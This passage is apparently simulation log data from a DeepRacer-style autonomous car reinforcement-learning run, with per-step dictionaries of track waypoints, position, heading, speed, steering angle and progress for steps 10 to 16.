4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 0.6666666666666666, 'x': 3.5129910650101888, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.97216416392405, 'all_wheels_on_track': True, 'distance_from_center': 0.014916561834819316, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096006411095111, 'object_in_camera': False, 'heading': 2.5651683948298047, 'objects_speed': [], 'progress': 2.761347830347507, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [2, 3], 'track_length': 19.549800178858835, 'steering_angle': -10.000000000000004, 'steps': 10.0},
{'is_left_of_center': True, 'projection_distance': 0.6396956392339029, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 0.6666666666666666, 'x': 3.6128402448619172, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.970047571665471, 'all_wheels_on_track': True, 'distance_from_center': 0.012950611627412687, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095911678188735, 'object_in_camera': False, 'heading': 1.0553793308345887, 'objects_speed': [], 'progress': 3.2721339010189485, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [3, 4], 'track_length': 19.549800178858835, 'steering_angle': 0.0, 'steps': 11.0},
{'is_left_of_center': True, 'projection_distance': 0.7285704934836759, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 1.3333333333333333, 'x': 3.7017125943659805, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9681031055656205, 'all_wheels_on_track': True, 'distance_from_center': 0.011124211652744676, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095992343579433, 'object_in_camera': False, 'heading': 0.2767237291255475, 'objects_speed': [], 'progress': 3.7267413826129663, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [3, 4], 'track_length': 19.549800178858835, 'steering_angle': 30.0, 'steps': 12.0},
{'is_left_of_center': True, 'projection_distance': 0.8016274740696829, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 1.3333333333333333, 'x': 3.774765480699354, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9669335292069253, 'all_wheels_on_track': True, 'distance_from_center': 0.01004660075486568, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095998714493209, 'object_in_camera': False, 'heading': -0.1052403210258782, 'objects_speed': [], 'progress': 4.100438197504255, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [4, 5], 'track_length': 19.549800178858835, 'steering_angle': 20.0, 'steps': 13.0},
{'is_left_of_center': True, 'projection_distance': 0.8745401089016366, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 1.3333333333333333, 'x': 3.8476821136791086, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9706337566148887, 'all_wheels_on_track': True, 'distance_from_center': 0.013824792099549267, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095972148979683, 'object_in_camera': False, 'heading': 0.7218580573268512, 'objects_speed': [], 'progress': 4.473396663395899, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [4, 5], 'track_length': 19.549800178858835, 'steering_angle': 0.0, 'steps': 14.0},
{'is_left_of_center': True, 'projection_distance': 0.9669518365713616, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 0.6666666666666666, 'x': 3.9401014233882807, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9776753407209586, 'all_wheels_on_track': True, 'distance_from_center': 0.020965191453877558, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096028325562612, 'object_in_camera': False, 'heading': 1.9265306120411614, 'objects_speed': [], 'progress': 4.946095754047778, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [4, 5], 'track_length': 19.549800178858835, 'steering_angle': -30.0, 'steps': 15.0},
{'is_left_of_center': True, 'projection_distance': 1.0607562161378383, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 2.0, 'x': 4.033901501422587, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9776927210085827, 'all_wheels_on_track': True, 'distance_from_center': 0.02106558857389254, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095984499001538, 'object_in_camera': False, 'heading': 1.173909182022218, 'objects_speed': [], 'progress': 5.425918456624128, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [5, 6], 'track_length': 19.549800178858835, 'steering_angle': 30.0, 'steps': 16.0},
